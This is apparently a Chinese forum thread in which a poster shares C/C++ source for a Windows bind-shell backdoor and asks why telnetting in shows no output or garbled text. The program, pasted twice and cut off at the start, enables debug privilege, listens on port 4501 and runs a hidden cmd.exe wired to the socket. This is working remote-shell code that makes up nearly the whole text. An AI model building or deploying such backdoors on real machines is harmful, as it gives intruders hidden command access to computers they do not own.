if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* elevation the privilege of current process. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
int main(int argc, char **argv)
{
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
//初始化WSA
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
//建立套接字
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
//地址信息
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
//绑定地址信息
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
//监听
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
//创建客户端的套接字
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
//循环监听
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
//得到STARTUPINFO信息,定义PROCESS_INFORMATION结构
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#12
这个程序编译后执行,telnet上去,为什么没有任何返回?执行命令也没有返回,或者返回干脆是乱码~